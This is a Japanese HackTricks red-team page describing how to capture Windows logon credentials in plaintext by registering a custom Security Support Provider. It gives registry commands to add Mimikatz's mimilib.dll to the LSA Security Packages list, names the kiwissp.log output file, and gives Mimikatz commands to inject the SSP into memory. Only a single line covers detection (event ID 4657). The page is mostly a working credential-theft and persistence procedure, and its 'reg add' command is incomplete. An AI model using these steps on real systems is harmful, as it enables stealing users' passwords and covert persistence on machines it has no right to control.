Custom SSP

htARTE(HackTricks AWS Red Team Expert) htARTE(HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ!

HackTricksをサポートする他の方法:

カスタムSSP

ここでSSP(セキュリティサポートプロバイダ)とは何かを学びます。 マシンへのアクセスに使用される資格情報を平文でキャプチャするために、独自のSSPを作成できます。

Mimilib

Mimikatzによって提供されるmimilib.dllバイナリを使用できます。これにより、すべての資格情報が平文でファイルに記録されます。 dllをC:\Windows\System32\に配置します。 既存のLSAセキュリティパッケージのリストを取得します:

attacker@target
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

セキュリティ サポート プロバイダ リスト (セキュリティ パッケージ) に mimilib.dll を追加します:

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

リブート後、すべての資格情報はC:\Windows\System32\kiwissp.log内で平文で見つけることができます。

メモリ内

また、Mimikatzを使用してこれを直接メモリにインジェクトすることもできます(注意:少し不安定で動作しない可能性があります)。

privilege::debug
misc::memssp

これは再起動を乗り越えられません。

緩和策

イベントID 4657 - HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages の作成/変更の監査

htARTE(HackTricks AWS Red Team Expert) でゼロからヒーローまでAWSハッキングを学ぶ

HackTricks をサポートする他の方法:

Last updated